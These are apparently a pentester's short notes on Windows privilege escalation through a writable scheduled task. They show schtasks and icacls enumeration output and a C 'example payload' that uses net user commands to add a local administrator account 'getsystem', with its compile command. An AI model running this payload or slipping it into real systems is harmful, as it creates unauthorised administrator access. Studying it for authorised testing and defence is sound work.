Scheduled Tasks
Three pieces of information are vital to obtain from a scheduled task to identify possible privilege escalation vectors:
As which user account (principal) does this task get executed?
What triggers are specified for the task?
What actions are executed when one or more of these triggers are met?
We should seek interesting information in the Author, TaskName, Task To Run, Run As User, and Next Run Time fields. In our case, "interesting" means that the information partially or completely answers one of the three questions above.
To Check
Get-ScheduledTask
PS C:\Users\root> schtasks /query /fo LIST /v
...
Folder: \Microsoft
HostName: BOSTON
TaskName: \Microsoft\CacheCleanup <- IMPT
Next Run Time: <- IMPT
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 7/11/2022 2:46:22 AM
Last Result: 0
Author: Boston\
Task To Run:
Start In: C:\Users\root\Pictures
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: l
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 7:37:21 AM
Start Date: 7/4/2022
...PS C:\Users\root> icacls C:\Users\root\Pictures\CacheCleanup.exe
C:\Users\root\Pictures\CacheCleanup.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
CLIENT\root:(I)(F)
CLIENT\Admin:(I)(F)Example Payload
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user getsystem getsystem /add");
i = system ("net localgroup administrators getsystem /add");
return 0;
}x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Last updated